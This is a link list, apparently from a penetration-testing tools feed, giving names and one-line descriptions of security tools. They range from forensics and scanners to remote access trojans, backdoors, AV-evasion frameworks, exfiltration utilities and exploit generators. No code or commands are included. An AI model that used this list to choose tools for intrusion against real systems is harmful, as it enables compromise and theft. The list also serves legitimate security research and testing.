- [Digital-Forensics-Lab - Free Hands-On Digital Forensics Labs For Students And Faculty](http://www.kitploit.com/2021/11/digital-forensics-lab-free-hands-on.html)
- [OffensiveRust - Rust Weaponization For Red Team Engagements](http://www.kitploit.com/2021/11/offensiverust-rust-weaponization-for.html)
- [DetectionLabELK - A Fork From DetectionLab With ELK Stack Instead Of Splunk](http://www.kitploit.com/2021/11/detectionlabelk-fork-from-detectionlab.html)
- [4-ZERO-3 - 403/401 Bypass Methods + Bash Automation](http://www.kitploit.com/2021/11/4-zero-3-403401-bypass-methods-bash.html)
- [Cracken - A Fast Password Wordlist Generator, Smartlist Creation And Password Hybrid-Mask Analysis Tool](http://www.kitploit.com/2021/11/cracken-fast-password-wordlist.html)
- [FakeDataGen - Full Valid Fake Data Generator](http://www.kitploit.com/2021/11/fakedatagen-full-valid-fake-data.html)
- [ELFXtract - An Automated Analysis Tool Used For Enumerating ELF Binaries](http://www.kitploit.com/2021/11/elfxtract-automated-analysis-tool-used.html)
- [goEnumBruteSpray - User Enumeration And Password Bruteforce On Azure, ADFS, OWA, O365 And Gather Emails On Linkedin](http://www.kitploit.com/2021/11/goenumbrutespray-user-enumeration-and.html)
- [Nanobrok - Web Service For Control And Protect Your Android Device Remotely](http://www.kitploit.com/2021/11/nanobrok-web-service-for-control-and.html)
- [LOLBins - PyQT5 App For LOLBAS And GTFOBins](http://www.kitploit.com/2021/11/lolbins-pyqt5-app-for-lolbas-and.html)
- [Redherd Framework -A Collaborative And Serverless Framework For Orchestrating A Geographically Distributed Group Of Assets](http://www.kitploit.com/2021/11/redherd-framework-collaborative-and.html)
- [Whoc - A Container Image That Extracts The Underlying Container Runtime](http://www.kitploit.com/2021/11/whoc-container-image-that-extracts.html)
- [Whispers - Identify Hardcoded Secrets In Static Structured Text](http://www.kitploit.com/2021/11/whispers-identify-hardcoded-secrets-in.html)
- [UDP-Hunter - Network Assessment Tool For Various UDP Services Covering Both IPv4 And IPv6 Protocols](http://www.kitploit.com/2021/11/udp-hunter-network-assessment-tool-for.html)
- [ThreatBox - A Standard And Controlled Linux Based Attack Platform](http://www.kitploit.com/2021/11/threatbox-standard-and-controlled-linux.html)
- [ThreadBoat - Program Uses Thread Execution Hijacking To Inject Native Shell-code Into A Standard Win32 Application](http://www.kitploit.com/2021/11/threadboat-program-uses-thread.html)
- [Stacs - Static Token And Credential Scanner](http://www.kitploit.com/2021/11/stacs-static-token-and-credential.html)
- [SillyRAT - A Cross Platform Multifunctional (Windows/Linux/Mac) RAT](http://www.kitploit.com/2021/11/sillyrat-cross-platform-multifunctional.html)
- [Registry-Recon - Cobalt Strike Aggressor Script That Performs System/AV/EDR Recon](http://www.kitploit.com/2021/11/registry-recon-cobalt-strike-aggressor.html)
- [pwnSpoof - Generates realistic spoofed log files for common web servers with customisable attack scenarios](http://www.kitploit.com/2021/11/pwnspoof-generates-realistic-spoofed.html)
- [Nosferatu - Lsass NTLM Authentication Backdoor](http://www.kitploit.com/2021/11/nosferatu-lsass-ntlm-authentication.html)
- [Msticpy - Microsoft Threat Intelligence Security Tools](http://www.kitploit.com/2021/11/msticpy-microsoft-threat-intelligence.html)
- [Kubernetes-Goat - Is A "Vulnerable By Design" Kubernetes Cluster. Designed To Be An Intentionally Vulnerable Cluster Environment To Learn And Practice Kubernetes Security](http://www.kitploit.com/2021/11/kubernetes-goat-is-vulnerable-by-design.html)
- [Kube-Applier - Enables Automated Deployment And Declarative Configuration For Your Kubernetes Cluster](http://www.kitploit.com/2021/11/kube-applier-enables-automated.html)
- [JVMXRay - Make Java Security Events Of Interest Visible For Analysis](http://www.kitploit.com/2021/11/jvmxray-make-java-security-events-of.html)
- [Hyenae-Ng - An Advanced Cross-Platform Network Packet Generator And The Successor Of Hyenae](http://www.kitploit.com/2021/11/hyenae-ng-advanced-cross-platform.html)
- [Gotanda - Browser Web Extension For OSINT](http://www.kitploit.com/2021/11/gotanda-browser-web-extension-for-osint.html)
- [Fhex - A Full-Featured HexEditor](http://www.kitploit.com/2021/11/fhex-full-featured-hexeditor.html)
- [EXOCET - AV-evading, Undetectable, Payload Delivery Tool](http://www.kitploit.com/2021/11/exocet-av-evading-undetectable-payload.html)
- [Cumulus - Web Application Weakness Monitoring, It Would Be Working By Add Just 3 Codelines](http://www.kitploit.com/2021/11/cumulus-web-application-weakness.html)
- [Clash - A Rule-Based Tunnel In Go](http://www.kitploit.com/2021/11/clash-rule-based-tunnel-in-go.html)
- [ChopChop - ChopChop Is A CLI To Help Developers Scanning Endpoints And Identifying Exposition Of Sensitive Services/Files/Folders](http://www.kitploit.com/2021/11/chopchop-chopchop-is-cli-to-help.html)
- [Canadian Furious Beaver - A Tool For Monitoring IRP Handler In Windows Drivers, And Facilitating The Process Of Analyzing, Replaying And Fuzzing Windows Drivers For Vulnerabilities](http://www.kitploit.com/2021/11/canadian-furious-beaver-tool-for.html)
- [AzureHunter - A Cloud Forensics Powershell Module To Run Threat Hunting Playbooks On Data From Azure And O365](http://www.kitploit.com/2021/11/azurehunter-cloud-forensics-powershell.html)
- [Ad-Honeypot-Autodeploy - Deploy A Small, Intentionally Insecure, Vulnerable Windows Domain For RDP Honeypot Fully Automatically](http://www.kitploit.com/2021/11/ad-honeypot-autodeploy-deploy-small.html)
- [Abaddon - Make red team operations faster, more repeatable, stealthier, while including value-added tools and bringing numerous reporting capabilities](http://www.kitploit.com/2021/11/abaddon-make-red-team-operations-faster.html)
- [Boofuzz - Network Protocol Fuzzing for Humans](http://www.kitploit.com/2021/11/boofuzz-network-protocol-fuzzing-for.html)
- [Covert-Control - Google Drive, OneDrive And Youtube As Covert-Channels - Control Systems Remotely By Uploading Files To Google Drive, OneDrive, Youtube Or Telegram](http://www.kitploit.com/2021/11/covert-control-google-drive-onedrive.html)
- [FormatFuzzer - A Framework For High-Efficiency, High-Quality Generation And Parsing Of Binary Inputs](http://feedproxy.google.com/~r/PentestTools/~3/2rheSbxKC6w/formatfuzzer-framework-for-high.html)
- [RottenPotatoNG - A C++ DLL And Standalone C++ Binary - No Need For Meterpreter Or Other Tools](http://feedproxy.google.com/~r/PentestTools/~3/ePALH_2XoBE/rottenpotatong-c-dll-and-standalone-c.html)
- [Private Set Membership (PSM) - Cryptographic Protocol That Allows Clients To Privately Query](http://feedproxy.google.com/~r/PentestTools/~3/pqJa8i58-Wk/private-set-membership-psm.html)
- [Ddosify - High-performance Load Testing Tool](http://feedproxy.google.com/~r/PentestTools/~3/d-bwUREmCJM/ddosify-high-performance-load-testing.html)
- [Koppeling - Adaptive DLL Hijacking / Dynamic Export Forwarding](http://feedproxy.google.com/~r/PentestTools/~3/5x-AiuigbLo/koppeling-adaptive-dll-hijacking.html)
- [Kunyu - More Efficient Corporate Asset Collection](http://feedproxy.google.com/~r/PentestTools/~3/rptEYYjcdOs/kunyu-more-efficient-corporate-asset.html)
- [Hashdb-Ida - HashDB API Hash Lookup Plugin For IDA Pro](http://feedproxy.google.com/~r/PentestTools/~3/o-e69-Jlipo/hashdb-ida-hashdb-api-hash-lookup.html)
- [Etl-Parser - Event Trace Log File Parser In Pure Python](http://feedproxy.google.com/~r/PentestTools/~3/hZwlZkWKuxg/etl-parser-event-trace-log-file-parser.html)
- [Smuggler - An HTTP Request Smuggling / Desync Testing Tool](http://feedproxy.google.com/~r/PentestTools/~3/qzTgEKQeN0o/smuggler-http-request-smuggling-desync.html)
- [Certipy - Python Implementation For Active Directory Certificate Abuse](http://feedproxy.google.com/~r/PentestTools/~3/BbAXzJqZvIs/certipy-python-implementation-for.html)
- [Tor-Rootkit - A Python 3 Standalone Windows 10 / Linux Rootkit Using Tor](http://feedproxy.google.com/~r/PentestTools/~3/90ux4gBXcFE/tor-rootkit-python-3-standalone-windows.html)
- [PyRDP - RDP Monster-In-The-Middle (Mitm) And Library For Python With The Ability To Watch Connections Live Or After The Fact](http://feedproxy.google.com/~r/PentestTools/~3/NPqVgUfEnv4/pyrdp-rdp-monster-in-middle-mitm-and.html)
- [Androidqf - (Android Quick Forensics) Helps Quickly Gathering Forensic Evidence From Android Devices, In Order To Identify Potential Traces Of Compromise](http://feedproxy.google.com/~r/PentestTools/~3/OH942WoxeqE/androidqf-android-quick-forensics-helps.html)
- [LDAPmonitor - Monitor Creation, Deletion And Changes To LDAP Objects Live During Your Pentest Or System Administration!](http://feedproxy.google.com/~r/PentestTools/~3/QhbZDWrvsf8/ldapmonitor-monitor-creation-deletion.html)
- [TIWAP - Totally Insecure Web Application Project](http://feedproxy.google.com/~r/PentestTools/~3/ryaDOslOPo0/tiwap-totally-insecure-web-application.html)
- [HandleKatz - PIC Lsass Dumper Using Cloned Handles](http://feedproxy.google.com/~r/PentestTools/~3/l-0eZWXudvo/handlekatz-pic-lsass-dumper-using.html)
- [ADLab - Custom PowerShell Module To Setup An Active Directory Lab Environment To Practice Penetration Testing](http://feedproxy.google.com/~r/PentestTools/~3/ODPn-u28lGI/adlab-custom-powershell-module-to-setup.html)
- [aDLL - Adventure of Dinamic Link Library](http://feedproxy.google.com/~r/PentestTools/~3/X7WLu5_jb8A/adll-adventure-of-dinamic-link-library.html)
- [Vimana - An Experimental Security Framework That Aims To Provide Resources For Auditing Python Web Applications](http://feedproxy.google.com/~r/PentestTools/~3/tXxaCsqWixo/vimana-experimental-security-framework.html)
- [Melting-Cobalt - A Cobalt Strike Scanner That Retrieves Detected Team Server Beacons Into A JSON Object](http://feedproxy.google.com/~r/PentestTools/~3/fjduiyduR_Q/melting-cobalt-cobalt-strike-scanner.html)
- [Web-Hacking-Toolkit - A Multi-Platform Web Hacking Toolkit Docker Image With Graphical User Interface (GUI) Support](http://feedproxy.google.com/~r/PentestTools/~3/0FNShIW296g/web-hacking-toolkit-multi-platform-web.html)
- [PeTeReport - An Open-Source Application Vulnerability Reporting Tool](http://feedproxy.google.com/~r/PentestTools/~3/6lwkVPX2eP8/petereport-open-source-application.html)
- [Dockerized-Android - A Container-Based Framework To Enable The Integration Of Mobile Components In Security Training Platforms](http://feedproxy.google.com/~r/PentestTools/~3/SCuXI_UPSk4/dockerized-android-container-based.html)
- [GC2 - A Command And Control Application That Allows An Attacker To Execute Commands On The Target Machine Using Google Sheet And Exfiltrate Data Using Google Drive](http://feedproxy.google.com/~r/PentestTools/~3/cz7YJpJ3GSo/gc2-command-and-control-application.html)
- [Scarce-Apache2 - A Framework For Bug Hunting Or Pentesting Targeting Websites That Have CVE-2021-41773 Vulnerability In Public](http://feedproxy.google.com/~r/PentestTools/~3/8_TI1-FA7is/scarce-apache2-framework-for-bug.html)
- [Http-Protocol-Exfil - Exfiltrate Files Using The HTTP Protocol Version ("HTTP/1.0" Is A 0 And "HTTP/1.1" Is A 1)](http://feedproxy.google.com/~r/PentestTools/~3/og4CpW83aso/http-protocol-exfil-exfiltrate-files.html)
- [HTTPUploadExfil - A Simple HTTP Server For Exfiltrating Files/Data During, For Example, CTFs](http://feedproxy.google.com/~r/PentestTools/~3/7BhOqREsxrI/httpuploadexfil-simple-http-server-for.html)
- [DonPAPI - Dumping DPAPI Credz Remotely](http://feedproxy.google.com/~r/PentestTools/~3/6sVzDunmsiY/donpapi-dumping-dpapi-credz-remotely.html)
- [Clash - A Rule-Based Tunnel In Go](http://feedproxy.google.com/~r/PentestTools/~3/E4kHYd9ksh4/clash-rule-based-tunnel-in-go.html)
- [Lorsrf - SSRF Parameter Bruteforce](http://feedproxy.google.com/~r/PentestTools/~3/M8KciApVxSg/lorsrf-ssrf-parameter-bruteforce.html)
- [Keeweb - Free Cross-Platform Password Manager Compatible With KeePass](http://feedproxy.google.com/~r/PentestTools/~3/ZqdnszgOOM0/keeweb-free-cross-platform-password.html)
- [Mediator - An Extensible, End-To-End Encrypted Reverse Shell With A Novel Approach To Its Architecture](http://feedproxy.google.com/~r/PentestTools/~3/JxbKF0rqHSg/mediator-extensible-end-to-end.html)
- [Webdiscover - The Purpose Of This Script Is To Automate The Web Enumeration Process And Search For Exploits](http://feedproxy.google.com/~r/PentestTools/~3/ZKxlFwj14UI/webdiscover-purpose-of-this-script-is.html)
- [VECTR - A Tool That Facilitates Tracking Of Your Red And Blue Team Testing Activities To Measure Detection And Prevention Capabilities Across Different Attack Scenarios](http://feedproxy.google.com/~r/PentestTools/~3/W7FX4P3lR1A/vectr-tool-that-facilitates-tracking-of.html)
- [ThreadStackSpoofer - PoC For An Advanced In-Memory Evasion Technique Allowing To Better Hide Injected Shellcode'S Memory Allocation From Scanners And Analysts](http://feedproxy.google.com/~r/PentestTools/~3/UWXjxJVJErg/threadstackspoofer-poc-for-advanced-in.html)
- [Terra - OSINT Tool On Twitter And Instagram](http://feedproxy.google.com/~r/PentestTools/~3/AllG-KrOBVo/terra-osint-tool-on-twitter-and.html)
- [SysFlow - Cloud-native System Telemetry Pipeline](http://feedproxy.google.com/~r/PentestTools/~3/-QhN4dZQpGY/sysflow-cloud-native-system-telemetry.html)
- [SubCrawl - A Modular Framework For Discovering Open Directories, Identifying Unique Content Through Signatures And Organizing The Data With Optional Output Modules, Such As MISP](http://feedproxy.google.com/~r/PentestTools/~3/hgb_KHFgats/subcrawl-modular-framework-for.html)
- [PowerShx - Run Powershell Without Software Restrictions](http://feedproxy.google.com/~r/PentestTools/~3/x_toIpDzAM0/powershx-run-powershell-without_0539831274.html)
- [PortBender - TCP Port Redirection Utility](http://feedproxy.google.com/~r/PentestTools/~3/O1I1TogLMyU/portbender-tcp-port-redirection-utility.html)
- [PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation](http://feedproxy.google.com/~r/PentestTools/~3/wJhUdlf1qeE/peass-ng-privilege-escalation-awesome.html)
- [NTFSTool - Forensics Tool For NTFS (Parser, MTF, Bitlocker, Deleted Files)](http://feedproxy.google.com/~r/PentestTools/~3/t5Sd7kW6OSw/ntfstool-forensics-tool-for-ntfs-parser.html)
- [Metabadger - Prevent SSRF Attacks On AWS EC2 Via Automated Upgrades To The More Secure Instance Metadata Service V2 (IMDSv2)](http://feedproxy.google.com/~r/PentestTools/~3/PwLgmrEsls4/metabadger-prevent-ssrf-attacks-on-aws.html)
- [Limelighter - A Tool For Generating Fake Code Signing Certificates Or Signing Real Ones](http://feedproxy.google.com/~r/PentestTools/~3/J9jpNvhhI4M/limelighter-tool-for-generating-fake.html)
- [LazyCSRF - A More Useful CSRF PoC Generator](http://feedproxy.google.com/~r/PentestTools/~3/x-MbT93aUIE/lazycsrf-more-useful-csrf-poc-generator.html)
- [Karma_V2 - A Passive Open Source Intelligence (OSINT) Automated Reconnaissance (Framework)](http://feedproxy.google.com/~r/PentestTools/~3/R6ga1P5yE_E/karmav2-passive-open-source.html)
- [Inceptor - Template-Driven AV/EDR Evasion Framework](http://feedproxy.google.com/~r/PentestTools/~3/IOpkwQ8RfqE/inceptor-template-driven-avedr-evasion.html)
- [ImpulsiveDLLHijack - C# Based Tool Which Automates The Process Of Discovering And Exploiting DLL Hijacks In Target Binaries](http://feedproxy.google.com/~r/PentestTools/~3/2borWVTuDHQ/impulsivedllhijack-c-based-tool-which.html)
- [Fapro - Free, Cross-platform, Single-file mass network protocol server simulator](http://feedproxy.google.com/~r/PentestTools/~3/CnJZy6huyrw/fapro-free-cross-platform-single-file.html)
- [DorkScout - Golang Tool To Automate Google Dork Scan Against The Entiere Internet Or Specific Targets](http://feedproxy.google.com/~r/PentestTools/~3/j0heDM-lqiE/dorkscout-golang-tool-to-automate.html)
- [Domain-Protect - Protect Against Subdomain Takeover](http://feedproxy.google.com/~r/PentestTools/~3/OnGaSHB3eUI/domain-protect-protect-against.html)
- [Packet-Sniffer - A pure-Python Network Packet Sniffing Tool](http://feedproxy.google.com/~r/PentestTools/~3/OJ0nyfCCzAY/packet-sniffer-pure-python-network.html)
- [Crawlergo - A Powerful Browser Crawler For Web Vulnerability Scanners](http://feedproxy.google.com/~r/PentestTools/~3/Vzcn4MyEzto/crawlergo-powerful-browser-crawler-for.html)
- [Networkit - A Growing Open-Source Toolkit For Large-Scale Network Analysis](http://feedproxy.google.com/~r/PentestTools/~3/APyByCQkyB4/networkit-growing-open-source-toolkit.html)
- [ForgeCert - "Golden" Certificates](http://feedproxy.google.com/~r/PentestTools/~3/xon0uLv8Tq8/forgecert-golden-certificates.html)
- [Xmap - A Fast Network Scanner Designed For Performing Internet-wide IPv6 &Amp; IPv4 Network Research Scanning](http://feedproxy.google.com/~r/PentestTools/~3/ltQ_QnrDSGo/xmap-fast-network-scanner-designed-for.html)
- [PowerShx - Run Powershell Without Software Restrictions](http://feedproxy.google.com/~r/PentestTools/~3/QOHWfv3DTV4/powershx-run-powershell-without.html)
- [Rdesktop - Open Source Client for Microsoft's RDP protocol](http://feedproxy.google.com/~r/PentestTools/~3/tgfbjNKOzJU/rdesktop-open-source-client-for.html)
- [Shisho - Lightweight Static Analyzer For Several Programming Languages](http://feedproxy.google.com/~r/PentestTools/~3/9rRB_tnw4YY/shisho-lightweight-static-analyzer-for.html)
- [LinuxCatScale - Incident Response Collection And Processing Scripts With Automated Reporting Scripts](http://feedproxy.google.com/~r/PentestTools/~3/vDw0z1GeXfE/linuxcatscale-incident-response.html)
- [Azur3Alph4 - A PowerShell Module That Automates Red-Team Tasks For Ops On Objective](http://feedproxy.google.com/~r/PentestTools/~3/YwVyBC5FquY/azur3alph4-powershell-module-that.html)
- [BruteLoops - Protocol Agnostic Online Password Guessing API](http://feedproxy.google.com/~r/PentestTools/~3/wwR0hGoKq-Y/bruteloops-protocol-agnostic-online.html)
- [FUSE - A Penetration Testing Tool For Finding File Upload Bugs](http://feedproxy.google.com/~r/PentestTools/~3/qb0qD_9M5no/fuse-penetration-testing-tool-for.html)
- [Qu1cksc0pe - All-in-One Static Malware Analysis Tool](http://feedproxy.google.com/~r/PentestTools/~3/ys6mOCgDrS8/qu1cksc0pe-all-in-one-static-malware.html)
- [GitOops - All Paths Lead To Clouds](http://feedproxy.google.com/~r/PentestTools/~3/eqzet56xFT8/gitoops-all-paths-lead-to-clouds.html)
- [AF-ShellHunter - Auto Shell Lookup](http://feedproxy.google.com/~r/PentestTools/~3/subWGZyFiO8/af-shellhunter-auto-shell-lookup.html)
- [Viper - Intranet Pentesting Tool With Webui](http://feedproxy.google.com/~r/PentestTools/~3/abBX2bHMdvY/viper-intranet-pentesting-tool-with.html)
- [Covert-Tube - Youtube As Covert-Channel - Control Systems Remotely And Execute Commands By Uploading Videos To Youtube](http://feedproxy.google.com/~r/PentestTools/~3/m5mQp-AUSfc/covert-tube-youtube-as-covert-channel.html)
- [Attack-Surface-Framework - Tool To Discover External And Internal Network Attack Surface](http://feedproxy.google.com/~r/PentestTools/~3/ItlxzRQG16Q/attack-surface-framework-tool-to.html)
- [SpoolSploit - A Collection Of Windows Print Spooler Exploits Containerized With Other Utilities For Practical Exploitation](http://feedproxy.google.com/~r/PentestTools/~3/gQfX9VnOHyc/spoolsploit-collection-of-windows-print.html)
- [Smersh - A Pentest Oriented Collaborative Tool Used To Track The Progress Of Your Company'S Missions](http://feedproxy.google.com/~r/PentestTools/~3/ytnkMByZc9s/smersh-pentest-oriented-collaborative.html)
- [Scrummage - The Ultimate OSINT And Threat Hunting Framework](http://feedproxy.google.com/~r/PentestTools/~3/FBtFReCh7r0/scrummage-ultimate-osint-and-threat.html)
- [pFuzz - Helps Us To Bypass Web Application Firewall By Using Different Methods At The Same Time](http://feedproxy.google.com/~r/PentestTools/~3/oFcTLQsG-wk/pfuzz-helps-us-to-bypass-web.html)
- [CarPunk - The Car Hacking Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/GsLUHFbclmc/carpunk-car-hacking-toolkit.html)
- [BurpCrypto - A Collection Of Burpsuite Encryption Plug-Ins, Support AES/RSA/DES/ExecJs(execute JS Encryption Code In Burpsuite)](http://feedproxy.google.com/~r/PentestTools/~3/qaQ9L4eSaAI/burpcrypto-collection-of-burpsuite.html)
- [Bopscrk - Tool To Generate Smart And Powerful Wordlists](http://feedproxy.google.com/~r/PentestTools/~3/tVnIBBKBI-c/bopscrk-tool-to-generate-smart-and.html)
- [AutomatedLab - A Provisioning Solution And Framework That Lets You Deploy Complex Labs On HyperV And Azure With Simple PowerShell Scripts](http://feedproxy.google.com/~r/PentestTools/~3/f2dNEhwRatY/automatedlab-provisioning-solution-and.html)
- [efiXplorer - IDA Plugin For UEFI Firmware Analysis And Reverse Engineering Automation](http://feedproxy.google.com/~r/PentestTools/~3/EOgwR1mGuz8/efixplorer-ida-plugin-for-uefi-firmware.html)
- [LeakDB - Web-Scale NoSQL Idempotent Cloud-Native Big-Data Serverless Plaintext Credential Search](http://feedproxy.google.com/~r/PentestTools/~3/HH-rLzC8CmU/leakdb-web-scale-nosql-idempotent-cloud.html)
- [Kekeo - A Little Toolbox To Play With Microsoft Kerberos In C](http://feedproxy.google.com/~r/PentestTools/~3/79MeWbwODY4/kekeo-little-toolbox-to-play-with.html)
- [Pwncat - Fancy Reverse And Bind Shell Handler](http://feedproxy.google.com/~r/PentestTools/~3/VxgChsw38Qk/pwncat-fancy-reverse-and-bind-shell.html)
- [Certify - Active Directory Certificate Abuse](http://feedproxy.google.com/~r/PentestTools/~3/sY-oxNvbm64/certify-active-directory-certificate.html)
- [PKINITtools - Tools For Kerberos PKINIT And Relaying To AD CS](http://feedproxy.google.com/~r/PentestTools/~3/IiXFP04JS1Q/pkinittools-tools-for-kerberos-pkinit.html)
- [SharpML - Machine Learning Network Share Password Hunting Toolkit](http://feedproxy.google.com/~r/PentestTools/~3/yLHH2NeKXEo/sharpml-machine-learning-network-share.html)
- [Webstor - A Script To Quickly Enumerate All Websites Across All Of Your Organization'S Networks, Store Their Responses, And Query For Known Web Technologies, Such As Those With Zero-Day Vulnerabilities](http://feedproxy.google.com/~r/PentestTools/~3/n_OJpQTHbog/webstor-script-to-quickly-enumerate-all.html)
- [Kodex - A Privacy And Security Engineering Toolkit: Discover, Understand, Pseudonymize, Anonymize, Encrypt And Securely Share Sensitive And Personal Data: Privacy And Security As Code](http://feedproxy.google.com/~r/PentestTools/~3/w0OPtiiYjn0/kodex-privacy-and-security-engineering.html)
- [LittleCorporal - A C# Automated Maldoc Generator](http://feedproxy.google.com/~r/PentestTools/~3/cHo6-nT03MA/littlecorporal-c-automated-maldoc.html)
- [SharpSpray - Active Directory Password Spraying Tool. Auto Fetches User List And Avoids Potential Lockouts](http://feedproxy.google.com/~r/PentestTools/~3/rJEwDTYMExM/sharpspray-active-directory-password.html)
- [StreamDivert - Redirecting (Specific) TCP, UDP And ICMP Traffic To Another Destination](http://feedproxy.google.com/~r/PentestTools/~3/WhvVHceGOT0/streamdivert-redirecting-specific-tcp.html)
- [Cloudquery - Transforms Your Cloud Infrastructure Into SQL Database For Easy Monitoring, Governance And Security](http://feedproxy.google.com/~r/PentestTools/~3/jA9ZBHWIEaw/cloudquery-transforms-your-cloud.html)
- [JadedWraith - Light-weight UNIX Backdoor](http://feedproxy.google.com/~r/PentestTools/~3/JwOqxOz8Tpg/jadedwraith-light-weight-unix-backdoor.html)
- [DongTai - An Interactive Application Security testing(IAST) Product That Supports The Detection Of OWASP WEB TOP 10 Vulnerabilities, Multi-Request Related Vulnerabilities (Including Logic Vulnerabilities, Unauthorized Access Vulnerabilities, Etc.), Third-Party Component Vulnerabilities, Etc.](http://feedproxy.google.com/~r/PentestTools/~3/Nh9bfWuJlu4/dongtai-interactive-application.html)
- [QueenSono - Golang Binary For Data Exfiltration With ICMP Protocol](http://feedproxy.google.com/~r/PentestTools/~3/yjtSw5APOBY/queensono-golang-binary-for-data.html)
- [PoW-Shield - Project Dedicated To Fight DDoS And Spam With Proof Of Work, Featuring An Additional WA](http://feedproxy.google.com/~r/PentestTools/~3/hdNsinW4eGU/pow-shield-project-dedicated-to-fight.html)
- [Haklistgen - Turns Any Junk Text Into A Usable Wordlist For Brute-Forcing](http://feedproxy.google.com/~r/PentestTools/~3/jKyaaIf77tQ/haklistgen-turns-any-junk-text-into.html)
- [Reconky - A Great Content Discovery Bash Script For Bug Bounty Hunters Which Automate Lot Of Task And Organized It](http://feedproxy.google.com/~r/PentestTools/~3/lZ-2AjIZmaE/reconky-great-content-discovery-bash.html)
- [JSPanda - Client-Side Prototype Pullution Vulnerability Scanner](http://feedproxy.google.com/~r/PentestTools/~3/KjYw519PYXo/jspanda-client-side-prototype-pullution.html)
- [Wordlistgen - Quickly Generate Context-Specific Wordlists For Content Discovery From Lists Of URLs Or Paths](http://feedproxy.google.com/~r/PentestTools/~3/GRG_wZ0LS6o/wordlistgen-quickly-generate-context.html)
- [AES256_Passwd_Store - Secure Open-Source Password Manager](http://feedproxy.google.com/~r/PentestTools/~3/-DNEyil7GdE/aes256passwdstore-secure-open-source.html)
- [DirSearch - A Go Implementation Of Dirsearch](http://feedproxy.google.com/~r/PentestTools/~3/9BLvnet-WEI/dirsearch-go-implementation-of-dirsearch.html)
- [Weakpass - Rule-Based Online Generator To Create A Wordlist Based On A Set Of Words](http://feedproxy.google.com/~r/PentestTools/~3/CsBox8woAW4/weakpass-rule-based-online-generator-to.html)
- [PyHook - An Offensive API Hooking Tool Written In Python Designed To Catch Various Credentials Within The API Call](http://feedproxy.google.com/~r/PentestTools/~3/i9bydF92nT4/pyhook-offensive-api-hooking-tool.html)
- [MailRipV2 - Improved SMTP Checker / SMTP Cracker With Proxy-Support, Inbox Test And Many More Features](http://feedproxy.google.com/~r/PentestTools/~3/lZVzuxef1ks/mailripv2-improved-smtp-checker-smtp.html)
- [CrowdSec - An Open-Source Massively Multiplayer Firewall Able To Analyze Visitor Behavior And Provide An Adapted Response To All Kinds Of Attacks](http://feedproxy.google.com/~r/PentestTools/~3/gG9kwuvxeY8/crowdsec-open-source-massively.html)
- [PS2EXE - Module To Compile Powershell Scripts To Executables](http://feedproxy.google.com/~r/PentestTools/~3/4GCtqIm0RZA/ps2exe-module-to-compile-powershell.html)
- [InlineExecute-Assembly - A PoC Beacon Object File (BOF) That Allows Security Professionals To Perform In Process .NET Assembly Execution](http://feedproxy.google.com/~r/PentestTools/~3/OMysaUjdez8/inlineexecute-assembly-poc-beacon.html)
- [QLOG - Windows Security Logging](http://feedproxy.google.com/~r/PentestTools/~3/RYfab7WQ10s/qlog-windows-security-logging.html)
- [BatchQL - GraphQL Security Auditing Script With A Focus On Performing Batch GraphQL Queries And Mutations](http://feedproxy.google.com/~r/PentestTools/~3/SwAM0mx-n-Q/batchql-graphql-security-auditing.html)
- [Concealed Position - Bring Your Own Print Driver Privilege Escalation Tool](http://feedproxy.google.com/~r/PentestTools/~3/2DO3NvabZho/concealed-position-bring-your-own-print.html)
- [Ntlm_Theft - A Tool For Generating Multiple Types Of NTLMv2 Hash Theft Files](http://feedproxy.google.com/~r/PentestTools/~3/rrWyIkKXPw8/ntlmtheft-tool-for-generating-multiple.html)
- [On-The-Fly - Tool Which Gives Capabilities To Perform Pentesting Tests In Several Domains (IoT, ICS & IT)](http://feedproxy.google.com/~r/PentestTools/~3/Ir0jOgIne4w/on-fly-tool-which-gives-capabilities-to.html)
- [DNSTake - A Fast Tool To Check Missing Hosted DNS Zones That Can Lead To Subdomain Takeover](http://feedproxy.google.com/~r/PentestTools/~3/FVcZf9Ub77E/dnstake-fast-tool-to-check-missing.html)
- [CVE-2021-40444 PoC - Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution)](http://feedproxy.google.com/~r/PentestTools/~3/LWE03MWYTeY/cve-2021-40444-poc-malicious-docx.html)
- [Plution - Prototype Pollution Scanner Using Headless Chrome](http://feedproxy.google.com/~r/PentestTools/~3/GFNOPRWcYV0/plution-prototype-pollution-scanner.html)
- [Kali Linux 2021.3 - Penetration Testing and Ethical Hacking Linux Distribution](http://feedproxy.google.com/~r/PentestTools/~3/L7jNh3MCrWg/kali-linux-20213-penetration-testing.html)
- [Vailyn - A Phased, Evasive Path Traversal + LFI Scanning & Exploitation Tool In Python](http://feedproxy.google.com/~r/PentestTools/~3/nT5Gy55GDdI/vailyn-phased-evasive-path-traversal.html)
- [Rootend - A *Nix Enumerator And Auto Privilege Escalation Tool](http://feedproxy.google.com/~r/PentestTools/~3/AOxmY5gAEKI/rootend-nix-enumerator-and-auto.html)
- [BoobSnail - Allows Generating Excel 4.0 XLM Macro](http://feedproxy.google.com/~r/PentestTools/~3/ZlJ0Sy3bKS8/boobsnail-allows-generating-excel-40.html)
- [targetedKerberoast - Kerberoast With ACL Abuse Capabilities](http://feedproxy.google.com/~r/PentestTools/~3/t2afWvJJ2BM/targetedkerberoast-kerberoast-with-acl.html)
- [Peirates - Kubernetes Penetration Testing Tool](http://feedproxy.google.com/~r/PentestTools/~3/mPr5fV37y6c/peirates-kubernetes-penetration-testing.html)
- [Gokart - A Static Analysis Tool For Securing Go Code](http://feedproxy.google.com/~r/PentestTools/~3/UXVTFt9Ltzk/gokart-static-analysis-tool-for.html)
- [Autoharness - A Tool That Automatically Creates Fuzzing Harnesses Based On A Library](http://feedproxy.google.com/~r/PentestTools/~3/BVqzkn1V4vI/autoharness-tool-that-automatically.html)
- [ODBParser - OSINT Tool To Search, Parse And Dump Only The Open Elasticsearch And MongoDB Directories That Have The Data You Care About Exposing](http://feedproxy.google.com/~r/PentestTools/~3/ev3M5QBZo94/odbparser-osint-tool-to-search-parse.html)
- [Pollenisator - Collaborative Pentest Tool With Highly Customizable Tools](http://feedproxy.google.com/~r/PentestTools/~3/MKAbMDRfEaQ/pollenisator-collaborative-pentest-tool.html)
- [Karta - Source Code Assisted Fast Binary Matching Plugin For IDA](http://feedproxy.google.com/~r/PentestTools/~3/3fLcgF_xDrE/karta-source-code-assisted-fast-binary.html)
- [WWWGrep - OWASP Foundation Web Respository](http://feedproxy.google.com/~r/PentestTools/~3/8rvQtLS_byo/wwwgrep-owasp-foundation-web-respository.html)
